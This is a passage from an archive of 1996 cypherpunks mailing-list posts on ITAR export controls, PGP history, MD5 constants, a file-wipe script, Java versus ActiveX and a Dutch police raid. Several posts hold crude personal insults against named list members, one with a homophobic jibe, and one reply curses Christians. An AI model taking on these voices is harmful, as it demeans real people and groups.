Controls with respect to the ITAR, the only difference is that now
it is going to be in writing.

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu
                     URL:  http://samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 14 Dec 1996 12:20:26 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Personal Reputation, was Re: Java DES breaker?
In-Reply-To: <v03007815aed8074e6636@[205.187.203.136]>
Message-ID: <cwXXyD188w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Bill Frantz <frantz@netcom.com> writes:

> At 6:39 PM -0800 12/13/96, Dr.Dimitri Vulis KOTM wrote:
> >It does. John Gilmore is a proven liar. He has no credibility.
>
> John will be a much later addition to my killfile than you.

John Gilmore (spit) is full of shit just like his boyfriend Timmy May (fart).

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Sat, 14 Dec 1996 11:43:10 -0800 (PST)
To: ph@netcom.com>
Subject: Re: Magic Numbers in MD5
In-Reply-To: <v02140b01aed7e51544ac@[192.0.2.1]>
Message-ID: <Pine.LNX.3.95.961214143723.587A-100000@gak.voicenet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 13 Dec 1996, Peter Hendrickson wrote:

> I am curious where some of the magic numbers in MD5 originated.
> 
> First, we have the four chaining variables, A, B, C, and D which
> are initialized with apparently random numbers.  Are they as
> random as they look, or are they carefully chosen?

Random?

A = 0x01234567
B = 0x89abcdef
C = 0xfedcba98
D = 0x76543210

> Second, we have the t_i values.  Schneier's first edition says this:
> 
> "In step i, t_i is the integer part of 4294967296xabs(sin(i)), when
> i is in radians.  (Note that 4294967296 is 2^32.)"
> 
> Does abs(sin()) have some properties that are especially conducive to
> strengthening MD5 or is it just a function to generate mildly random
> numbers?  If the latter, wouldn't the algorithm be stronger if it was
> used with completely random numbers?

I am not sure of the properties of abs(sin()).  I know that the S-boxes in
Blowfish are initialized with pi.  I would guess that the purpose of using
such values is to use easily generated pseudo-random numbers.

Mark
- -- 
finger -l for PGP key
PGP encrypted mail prefered.
0xf9b22ba5 now revoked

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMrMD/SzIPc7jvyFpAQEA7gf9HAtV1Vy+3LO5OPOHyU9ZHoath32LhAwU
PzODS/YJsY9fVxaMHOm15oL9D4CX2D5s/Y9cgrALG6pGzw4dBWJZJyqNAcbmsjp/
B/jNL9jXKCXg1byIzplKSjJqDypLzIPf07xTIQVCC5IDmwZ7pR5owngH9MDaE8is
aFiGZvuWNm7eHQg1kJSb40xQjkwszx+SP1Gv9+fvpys5GZLCTHwPx8SCpy7PXwNp
lm8fgV9mjc7wZIpw73oqPZEb7Q3VHZUOUXS2i6XNF3UVXa4aykBg5VvALPt0tuvv
ah5JjA6JP4STwSCj+HrnMpQJ8SCG4U3kKb54+WOl8H6eo7ekuEU8mw==
=uNLG
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew Ghio <ghio@myriad.alias.net>
Date: Sat, 14 Dec 1996 12:01:03 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Secure Erase for PCs?
In-Reply-To: <199612100131.RAA19898@netcom.netcom.com>
Message-ID: <199612141959.OAA00409@myriad>
MIME-Version: 1.0
Content-Type: text/plain


Dale Thorn <dthorn@gte.net> wrote:
> It's a hundred times easier to do tools for the IBM PC.  I make
> utilities for the PC, and it would take no more than ten or fifteen
> minutes to cook this one up.

It took me less than ten minutes...

> But nobody answered my question:  Is there a shortcut way to do the
> wipe, say, thirty times?  Ordinarily, I'd run the program thirty
> times, which would consist of a data write followed by a flush,
> which would take 30x amount of time.

Try this in Linux...

#!/bin/csh
set n=1
loop:
cat /dev/urandom >/tmp/fill
rm /tmp/fill
@ n = $n + 1
if ( $n < 30 ) then
  goto loop
endif




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Sat, 14 Dec 1996 12:01:03 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: [No joke] The Feds may legally gas us
In-Reply-To: <Pine.LNX.3.95.961214151929.5039A-100000@random.sp.org>
Message-ID: <Pine.LNX.3.95.961214144830.587B-100000@gak.voicenet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 14 Dec 1996, The Deviant wrote:

> On Fri, 13 Dec 1996, Lucky Green wrote:
> 
> > Folks,
> > Did you know that the Feds may legally test chemical and biological weapons
> > on the civilian population as long as they give 30 days advance notice to
> > the local bigwigs (so they can get themselves and their families out of the
> > danger zone)?
> >
> > This is not a joke. It is in the United States Code.
> >
> 
> No, they can't.  Development, testing, and use of Biological weapons is
> banned by the Geneva conventions (among others).  International treaty
> outweighs USC.

This still leaves chemical weapons.  Certain chemical weapons are explicitly
banned by treaties, but many of them aren't so the USG is free to test them on
anyone they want.  The U.S. military is also free to conduct training
excercises in heavily populated civilian areas.
http://www.erols.com/igoddard/copters.htm has an article about the military
conducting "urban warfare" training in major U.S. cities.

Mark
- -- 
finger -l for PGP key
PGP encrypted mail prefered.
0xf9b22ba5 now revoked



-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMrMINyzIPc7jvyFpAQECYAgAkGTMTgdpBFR1Nd5wXhD5Xh/axCshijMz
C6ff1zNRIYbepZwLVaSx/EXM0+cRiMEIYG8//gtn66+HEsxWoPHhtfl0MUNU2Szd
qjB2QfnFDlVcTNkF6z2edqDatgiEy726q3Dd9iWnQ1tPZ8Qpn3KkOJe3AeNHsu93
tv1dQuNel8iMajfj7Hoes7PBrMdRkO0A5eIA7KIWOJ6aHloXijmSEo281DBgKyr4
CKDQ/rI6PX0kTY8hathDRhQfslekX7MF4DKKjpIRkZq6XfnhGeuVgusm+nrE0Ihp
TqGmiCY6u9JwOsf6D23ArT5ilJND4+zVihQgHTqv6Ffbet32u4neiA==
=/wQb
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Sat, 14 Dec 1996 13:29:38 -0800 (PST)
To: Santa Claus <infoserver@reply.net>
Subject: Re: Merry Christmas, HipXmas-SantaSpam!
In-Reply-To: <4245141.0C0DKO@reply.net>
Message-ID: <Pine.BSF.3.91.961214151814.24935C-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain




and a Happy Chanukah to to Dimitri ...

-r.w.

On Wed, 11 Dec 1996, Santa Claus wrote:

>                               *
>                               *
>                              /|\
>                            ///*\\\
>                            *  *  *
>                          //\\ * //\\ 
>                         * *  *  *  *
>                       // \\ // \\ // \\
>                           S A N T A 
>                             * * *
>                       N O R T H  P O L E
>                             |  |
>                            \____/
> 
> 
>     Wherever you go, whatever you do,
>     Remember that Santa is always with you.
>     I live in your heart, I dance in your soul,
>     I show you what love is, and good things to know.
> 
>     The Spirit of Christmas spreads all through the land,
>     With joy and the giving of gifts you should have.
>     But gifts are just one thing to give and to get --
>     We wish you much more, far more than that.
> 
>     My elves send you pride in whatever you do,
>     My reindeer give strength on days you feel blue,
>     My wife, Mrs. Claus, grants wisdom and grace,
>     Belief in yourself and all you create.
> 
>     And me, what do I give? Is there much more?
>     Plenty and plenty you won't find in stores.
>     I give you the knowledge that you can do more
>     Than you ever knew -- of that be quite sure.
> 
>     My sleigh's packed with toys, my list sweeps the floor,
>     A cup of hot cocoa and I'm out the door.
>     Just gaze high in the sky where Peace always soars,
>     And you live in my heart as I live in yours.
> 
>                            *
>                           * *
>                          * * *
>                        M e r r y
>                    C h r i s t m a s 
>                           * *
>                   S a n t a  C l a u s
> 
> 
> ---------
> This santa poem was sent to you from a person who visited
> the ReplyNet site (www.reply.net) and entered your name
> and address on our Santa page.  Your e-mail address is
> NOT being collected.
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Sat, 14 Dec 1996 07:21:40 -0800 (PST)
To: Lucky Green <shamrock@netcom.com>
Subject: Re: [No joke] The Feds may legally gas us
In-Reply-To: <3.0.32.19961213231550.00698d18@netcom14.netcom.com>
Message-ID: <Pine.LNX.3.95.961214151929.5039A-100000@random.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 13 Dec 1996, Lucky Green wrote:

> Folks,
> Did you know that the Feds may legally test chemical and biological weapons
> on the civilian population as long as they give 30 days advance notice to
> the local bigwigs (so they can get themselves and their families out of the
> danger zone)?
> 
> This is not a joke. It is in the United States Code.
> 

No, they can't.  Development, testing, and use of Biological weapons is
banned by the Geneva conventions (among others).  International treaty
outweighs USC.

 --Deviant
   PGP KeyID = E820F015 Fingerprint = 3D6AAB628E3DFAA9 F7D35736ABC56D39

"Obviously, a major malfunction has occurred."
                -- Steve Nesbitt, voice of Mission Control, January 28,
                   1986, as the shuttle Challenger exploded within view
                   of the grandstands.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMrLFxzCdEh3oIPAVAQEYrwf+PKa9YLfFauJ+iWpGFCRBgLx+Z6skpvlm
2a2YShx/mi7U6UeFav6ldb3PJ5BxjHsrQFy9Fr4Gbxnc0zbDB+3HjHzuAm0+/jLg
WMCOif9PR8X8W00BuhUuOC1yvrbzvYv6tVY0LUdMhVScm8chvetUKpGxL2JmF1Hw
RUVte+iU7udx4Kkn2PEPzrr3mvQBhBq3mBl3v41kdR8HzmVt+nkjPJ/ynZHr5GLn
1luhz+9uSwYxQKdthgqgKvwA4t8fr7vg7L27Rl6m0OBKVjNFU5tKQVmlfuvXYbwe
CUZdy15M78I25o9+4RbeZCNUGjhvbek9GGZEELTkVxeFaNA+Yr9iOw==
=DJPE
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tank <tank@xs4all.nl>
Date: Sat, 14 Dec 1996 06:34:26 -0800 (PST)
To: tank@xs4all.nl (tank)
Subject: Radikal: raid in the netherlands
Message-ID: <199612141431.PAA28352@xs1.xs4all.nl>
MIME-Version: 1.0
Content-Type: text/plain


PRESS-DECLARATION  14-12-96
After the German authorities tried to force their censorship on people's
thoughts and writings worldwide on the Internet, Germany now tries to
prosecute a person who lives in the Netherlands for the making of the
left-wing newspaper Radikal.

In the morning of the 11th of December there was a houseraid in the
village of Vaals (The Netherlands). In the raid ten local police-officers,
a high officer from the Maastricht-court, two LKA (Landes Kriminal Ambt)
German officers and two BKA (Bundes Kriminal Ambt) German officers took
place.

The 16 German and Dutch officers forced themselves into the house with the
help of a lock specialist. The only person at home during the raid only
noticed it after some time when the room next to her was already being
searched. The german and dutch police refuged to explain the reason for
this raid. German autorities refered to the dutch ones for explanations
and the other way around. It was only after insisting that they explained
the search warrant came from the german authorities in Karlsruhe. During
the two hour raid two personal computers, floppy-discs, foto's, a pamflet
and some Radikal stickers were seized.

During this whole operation it was not clear against who or what this
action was aimed and why this house was searched. It only became clear
after the raid when another person came home from his work and phoned his
mother in Aachen (Germany). At his mothers house there was also a house
raid going on, nothing was taken there.

At this house-raid six LKA officers took part and in a paper they
declaired to have reasons for this raid because of evidence found in the
raid in Vaals. "During the raid at the suspect's house evidence was found
(...) that show the suspect (...) is using the house of his mother as
well". This evidence consisted of his mother's car papers.

The declaration paper alsow showed the purpose of the raid: " The search
for Radikal publications, subscribers lists and financial information".
The suspect is being charged with the making and distributing of the left
wing newspaper Radikal. A newspaper that is forbidden only in Germany .

The supposed involvement with a political magazine, forbidden in Germany,
apparently is enough for the Dutch authorities to work for the German
juridical apparatus. This means that the German idea of law and order
concerning magazines leads to the joint persecution of a Spanish citizen
living in the Netherlands. Although the magazine is entirely legal in the
Netherlands.

The dimension of the German-Dutch cooperation within the framework of the
new "European Security Policy" is shown here in a very clear way. It shows
that an attempt is made to completely redefine the persecution, across all
borders, of politically unwanted people.

Solidaritygroup Political Prisoners
P/o box 3762 
1001 AN Amsterdam
The Nertherlands

<tank@xs4all.nl>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tank <tank@xs4all.nl>
Date: Sat, 14 Dec 1996 06:37:44 -0800 (PST)
To: tank@xs4all.nl (tank)
Subject: radikal: raid in the netherlands
Message-ID: <199612141436.PAA28508@xs1.xs4all.nl>
MIME-Version: 1.0
Content-Type: text/plain


PRESS-DECLARATION  14-12-96
After the German authorities tried to force their censorship on people's
thoughts and writings worldwide on the Internet, Germany now tries to
prosecute a person who lives in the Netherlands for the making of the
left-wing newspaper Radikal.

In the morning of the 11th of December there was a houseraid in the
village of Vaals (The Netherlands). In the raid ten local police-officers,
a high officer from the Maastricht-court, two LKA (Landes Kriminal Ambt)
German officers and two BKA (Bundes Kriminal Ambt) German officers took
place.

The 16 German and Dutch officers forced themselves into the house with the
help of a lock specialist. The only person at home during the raid only
noticed it after some time when the room next to her was already being
searched. The german and dutch police refuged to explain the reason for
this raid. German autorities refered to the dutch ones for explanations
and the other way around. It was only after insisting that they explained
the search warrant came from the german authorities in Karlsruhe. During
the two hour raid two personal computers, floppy-discs, foto's, a pamflet
and some Radikal stickers were seized.

During this whole operation it was not clear against who or what this
action was aimed and why this house was searched. It only became clear
after the raid when another person came home from his work and phoned his
mother in Aachen (Germany). At his mothers house there was also a house
raid going on, nothing was taken there.

At this house-raid six LKA officers took part and in a paper they
declaired to have reasons for this raid because of evidence found in the
raid in Vaals. "During the raid at the suspect's house evidence was found
(...) that show the suspect (...) is using the house of his mother as
well". This evidence consisted of his mother's car papers.

The declaration paper alsow showed the purpose of the raid: " The search
for Radikal publications, subscribers lists and financial information".
The suspect is being charged with the making and distributing of the left
wing newspaper Radikal. A newspaper that is forbidden only in Germany .

The supposed involvement with a political magazine, forbidden in Germany,
apparently is enough for the Dutch authorities to work for the German
juridical apparatus. This means that the German idea of law and order
concerning magazines leads to the joint persecution of a Spanish citizen
living in the Netherlands. Although the magazine is entirely legal in the
Netherlands.

The dimension of the German-Dutch cooperation within the framework of the
new "European Security Policy" is shown here in a very clear way. It shows
that an attempt is made to completely redefine the persecution, across all
borders, of politically unwanted people.

Solidaritygroup Political Prisoners
P/o box 3762 
1001 AN Amsterdam
The Nertherlands

<tank@xs4all.nl>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 14 Dec 1996 13:20:10 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: your mail
In-Reply-To: <199612141744.LAA01193@manifold.algebra.com>
Message-ID: <aP3XyD197w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


ichudov@algebra.com (Igor Chudov @ home) writes:

> ArkanoiD wrote:
> >
> > nuqneH,
> >
> > > Hey.. is there any CoderPunks Meetings somewhere in russia?
> > >
> > Michael Bravo tried to organize 2600 meetings in SPb and failed. (afaik)
>
> Why?

Potomu, chto Sovok parhatyj. :-)

The meetings consisted entirely of "stukachi".

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 14 Dec 1996 13:30:24 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Personal Reputation, was Re: Java DES breaker?
In-Reply-To: <19961214210859.2844.qmail@suburbia.net>
Message-ID: <8q4XyD200w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Julian writes:

> > Bill Frantz <frantz@netcom.com> writes:
> >
> > > At 6:39 PM -0800 12/13/96, Dr.Dimitri Vulis KOTM wrote:
> > > >It does. John Gilmore is a proven liar. He has no credibility.
> > >
> > > John will be a much later addition to my killfile than you.
> >
> > John Gilmore (spit) is full of shit just like his boyfriend Timmy May (fart)
>
> Vulis, I can't understand your need for these childish quips. They just make
> you look idiotic. At least have some sense of your own dignity.

John Gilmore is a crook and a liar. He has no credibility and no dignity.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: proff@suburbia.net
Date: Sat, 14 Dec 1996 01:31:10 -0800 (PST)
To: tcmay@got.net (Timothy C. May)
Subject: Re: Race and IQ
In-Reply-To: <v03007800aed7dc316131@[207.167.93.63]>
Message-ID: <19961214054348.15808.qmail@suburbia.net>
MIME-Version: 1.0
Content-Type: text/plain


> (For the curious, I am persuaded that there are minimal differences in
> "intelligence" between the several or many races, but that cultural and
> sociological factors strongly affect upbringing, learning, interest in
> doing well in school, ability on standardized tests, success in business
> matters, and so on.)
> 
> --Tim May

Just as there are differences in physical attributes between races,
so to are there are differences in the brain between races, and even
for genetic enclaves within races (and sexes which genetically,
contain greater differences than between races).  However, it has
been my experience that individual differences exceed racial
differences making the whole race vs. anything discussion a waste of time.
i.e people should be judged as individuals not as members of one
race or another, because that is where the most useful discrimination
lays.

The only time as-a-race attributes matter is when you are setting
public policy for an-entire-race, which in my opinion should never
be done. Set the rudder of your public policy by the correlation
between the statistical attributes that you are trying to address,
rather than what may or may not be a real correlation between those
attributes and race.

-Julian (proff@suburbia.net)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Erp <erp@digiforest.com>
Date: Sat, 14 Dec 1996 16:55:27 -0800 (PST)
To: Rabid Wombat <wombat@mcfeely.bsfs.org>
Subject: Re: Merry Christmas, HipXmas-SantaSpam!
In-Reply-To: <Pine.BSF.3.91.961214151814.24935C-100000@mcfeely.bsfs.org>
Message-ID: <Pine.LNX.3.95.961214170451.30364A-100000@digital.digiforest.com>
MIME-Version: 1.0
Content-Type: text/plain


Fucking Christians...  ---  Can't live without getting religious spam mail
and being told why I should be there religion and not mine..  Bah..  And
yes I know this message wasn't a pressure message..  It was just one of
those straws that made me go bleh, time to say something..


On Sat, 14 Dec 1996, Rabid Wombat wrote:

> 
> 
> and a Happy Chanukah to to Dimitri ...
> 
> -r.w.
> 
> On Wed, 11 Dec 1996, Santa Claus wrote:
> 
> >                               *
> >                               *
> >                              /|\
> >                            ///*\\\
> >                            *  *  *
> >                          //\\ * //\\ 
> >                         * *  *  *  *
> >                       // \\ // \\ // \\
> >                           S A N T A 
> >                             * * *
> >                       N O R T H  P O L E
> >                             |  |
> >                            \____/
> > 
> > 
> >     Wherever you go, whatever you do,
> >     Remember that Santa is always with you.
> >     I live in your heart, I dance in your soul,
> >     I show you what love is, and good things to know.
> > 
> >     The Spirit of Christmas spreads all through the land,
> >     With joy and the giving of gifts you should have.
> >     But gifts are just one thing to give and to get --
> >     We wish you much more, far more than that.
> > 
> >     My elves send you pride in whatever you do,
> >     My reindeer give strength on days you feel blue,
> >     My wife, Mrs. Claus, grants wisdom and grace,
> >     Belief in yourself and all you create.
> > 
> >     And me, what do I give? Is there much more?
> >     Plenty and plenty you won't find in stores.
> >     I give you the knowledge that you can do more
> >     Than you ever knew -- of that be quite sure.
> > 
> >     My sleigh's packed with toys, my list sweeps the floor,
> >     A cup of hot cocoa and I'm out the door.
> >     Just gaze high in the sky where Peace always soars,
> >     And you live in my heart as I live in yours.
> > 
> >                            *
> >                           * *
> >                          * * *
> >                        M e r r y
> >                    C h r i s t m a s 
> >                           * *
> >                   S a n t a  C l a u s
> > 
> > 
> > ---------
> > This santa poem was sent to you from a person who visited
> > the ReplyNet site (www.reply.net) and entered your name
> > and address on our Santa page.  Your e-mail address is
> > NOT being collected.
> > 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Sat, 14 Dec 1996 17:56:36 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: ITARs effects
In-Reply-To: <199612141904.OAA07254@pdj2-ra.F-REMOTE.CWRU.Edu>
Message-ID: <v03007800aed90a375612@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:09 PM -0500 12/14/96, Adam Shostack wrote:
>Peter D. Junger wrote:
>|
>| : This implies that putting something up for FTP == export. Holy
>| : shit.
>|
>| That has always been the position of the Department of Defense Trade
>| Controls with respect to the ITAR, the only difference is that now
>| it is going to be in writing.
>
>	My understanding is that they choose not to continue
>per^H^Hrosecuting Phil for putting the code up for FTP.  Thus, this is
>a change.  Or did Phil not put the code up for FTP?

I certainly can't speak for Phil, but according to everything I have heard,
and according to several articles that have been written about the events
surrounding the release of PGP 1.0, Phil most definitely DID NOT place the
PGP 1.0 software on any kind of ftp site.

(I believe that at that time, circa 1991, Phil did not even have any kind
of ISP or university Internet access which would have even made this
possible for him. In fact, I believe it was not until around 1993 that he
had a stable e-mail account.)

As to who, if anybody, placed PGP 1.0 on an ftp site, I suggest folks read
some of the articles about how the software was uploaded to bulletin
boards. The evidence is strong that it was NOT Phil who did this, though of
course the software at some point got from Phil to whomover it was who did
place the software on bulletin boards (and ultimately onto ftp sites).

(Note that it was primarily PGP 1.0 which was the subject of the
government's investigations. PGP 2.0 and later releases were handled in a
different way.)

I hope I have not mangled any of the history. These events have been
reported in many articles on PGP and the Zimmermann Affair, including a
long article by Jim Warren on whom--he claims--actually DID place PGP on
publically-accessible sites. See those articles for more details.

It seems likely to me that the new laws, pointed out to us by Lucky, would
make a much wider range of things illegal, and that the mere appearance of
some software on a foreign site could be construed as ipso facto proof that
due care was not taken ("you let it leak out").

But this was not the law in 1991, nor is it the law yet.

--Tim May

Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Sat, 14 Dec 1996 10:23:57 -0800 (PST)
To: Dale Thorn <dthorn@gte.net>
Subject: Re: [No joke] The Feds may legally gas us
In-Reply-To: <32B2E9A0.4592@gte.net>
Message-ID: <Pine.LNX.3.95.961214180857.879A-100000@random.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 14 Dec 1996, Dale Thorn wrote:

> The Deviant wrote:
> > On Fri, 13 Dec 1996, Lucky Green wrote:
> > > Folks,
> > > Did you know that the Feds may legally test chemical and biological weapons
> > > on the civilian population as long as they give 30 days advance notice to
> > > the local bigwigs (so they can get themselves and their families out of the
> > > danger zone)?
> > > This is not a joke. It is in the United States Code.
> 
> > No, they can't.  Development, testing, and use of Biological weapons is
> > banned by the Geneva conventions (among others).  International treaty
> > outweighs USC.
> 
> They can't, but they do. The gas used at Waco was banned internationally,
> but Janet Reno justified it, and she just got rehired.

True, but the point still stands -- They can't, legally.

 --Deviant
   PGP KeyID = E820F015 Fingerprint = 3D6AAB628E3DFAA9 F7D35736ABC56D39

What does not destroy me, makes me stronger.
		-- Nietzsche


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMrLtUzCdEh3oIPAVAQGSlAf9F5sRKuqJMdFujzsf/c1dnxBbKjaDoED0
dSKCsGJmgAlpyIFNgSwlfXQV3Q9PM8nHuizb1yGmemOxE9cABQgQhGE817kdcbGH
g2V9W7oXGDivK3FsNmEiCQGVuPpu+B4HiypaXaZ5OcUHr1ZXVKiMSgy8LokkdUWn
z43HzQ5hKobaRmlc8x+PvCtpSAtiP0EhYBvIUN0+z3cF0IX41fIJK3UawYENskG/
6kLdozmORTffyQOrbQ4w2IDE16lupsv5xwxYg8mH+edj4iQ74pTqmnl/KFn2vhO3
0taSu3hr6XHMlzQNp0Wa8yTbXiDVbzqdPPKCvoI5kI78W76I7UUXdA==
=Jgzf
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Sat, 14 Dec 1996 15:21:56 -0800 (PST)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: Java DES breaker?
In-Reply-To: <9yVuyD159w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.91.961214181659.29415A-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 12 Dec 1996, Dr.Dimitri Vulis KOTM wrote:

> > While ActiveX does support hand optmized assembler, there are Java
> > JustInTime compilers which take JVM bytecodes and turn'em into raw
> > assembler.  They aren't hand optimized, they are natively compiled code,
> > but they are native code non the less.  A good optimizing compiler may
> 
> I've seen many Forth implementations, including pseudo-compilers similar
> to what you describe. They sure generated a lot of instructions and an
> occasional speed improvement over a simple-minded interpreter.

Forth!=Java.  Test it before you speak.
 
> Can it go out on the web and talk to arbitrary servers?

Sure it can, you just have to let your server act as a proxy and do a bit 
of work.  An applet snarfed over the net can only talk to the server.  
But the server can talk to other servers.

> Can it work with local files?

Not as an applet, but as an application, sure.  Also why would you want a 
DES breaker to put stuff on the client's hard drive?  It's far better in 
terms of security - both for the client and for the server to store'em on 
the server.
 
In other words, you can't be lazy.  You have to write a good server that 
will handle some of the legwork, but leave the DES to the client.

> Where did the 10-25% figure come from?

Like I said - try it.
 
> Of course, Ray works for Earthweb, who has a "special partnership" with
> SunSoft, and gets paid to badmouth competing products and push Java when
> it's clearly inappropriate.

Or maybe Ray knows what he's talking about BECAUSE of that same 
implication. :)  As for inappropriate, ActiveX is inappropriate for most 
uses - any web page attachable code that when downloaded and executed can 
format your hard drive is inappropriate.  Regardless of performance.

Until Microsoft secures ActiveX in it's own sandbox and doesn't allow it 
to access things it shouldn't, it's not cool.

Anyhow, I will drop this topic here since it's becoming an ActiveX vs 
Java religious crusade and is inappropriate.

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    | "If  you're  gonna die,  die  with your|./|\.
..\|/..|sunder@sundernet.com|boots on;  If you're  gonna  try,  just |/\|/\
<--*-->| ------------------ |stick around; Gonna cry? Just move along|\/|\/
../|\..| "A toast to Odin,  |you're gonna die, you're gonna die!"    |.\|/.
.+.v.+.|God of screwdrivers"|  --Iron Maiden "Die With Your Boots on"|.....
======================== http://www.sundernet.com =========================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sat, 14 Dec 1996 21:09:49 -0800 (PST)
To: devnull@manifold.algebra.com
Subject: Re: Java DES breaker?
In-Reply-To: <Pine.SUN.3.91.961214181659.29415A-100000@beast.brainlink.com>
Message-ID: <199612150049.SAA00282@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Ray Arachelian wrote:
> 
> Until Microsoft secures ActiveX in it's own sandbox and doesn't allow it 
> to access things it shouldn't, it's not cool.
> 

I do not understand how one can secure ActiveX.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ArkanoiD <ark@paranoid.convey.ru>
Date: Sat, 14 Dec 1996 08:13:35 -0800 (PST)
To: fygrave@freenet.bishkek.su (Fyodor Yarochkin)
Subject: Re: your mail
In-Reply-To: <Pine.LNX.3.91.961212160850.8387C-100000@freenet.bishkek.su>
Message-ID: <199612141608.TAA03589@paranoid.convey.ru>
MIME-Version: 1.0
Content-Type: text/plain


nuqneH,

> 
> 
> Hey.. is there any CoderPunks Meetings somewhere in russia?
> 
> 
Michael Bravo tried to organize 2600 meetings in SPb and failed. (afaik)

-- 
                                       _     _  _  _  _      _  _
   {::} {::} {::}  CU in Hell          _| o |_ | | _|| |   / _||_|   |_ |_ |_
   (##) (##) (##)        /Arkan#iD    |_  o  _||_| _||_| /   _|  | o |_||_||_|
   [||] [||] [||]            Do i believe in Bible? Hell,man,i've seen one!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Sat, 14 Dec 1996 16:14:19 -0800 (PST)
To: junger@pdj2-ra.F-REMOTE.CWRU.Edu (Peter D. Junger)
Subject: Re: ITARs effects
In-Reply-To: <199612141904.OAA07254@pdj2-ra.F-REMOTE.CWRU.Edu>
Message-ID: <199612150010.TAA02707@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain


Peter D. Junger wrote:
| 
| : This implies that putting something up for FTP == export. Holy
| : shit.
| 
| That has always been the position of the Department of Defense Trade
| Controls with respect to the ITAR, the only difference is that now
| it is going to be in writing.

	My understanding is that they choose not to continue
per^H^Hrosecuting Phil for putting the code up for FTP.  Thus, this is
a change.  Or did Phil not put the code up for FTP?

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 14 Dec 1996 17:20:30 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Merry Christmas, HipXmas-SantaSpam!
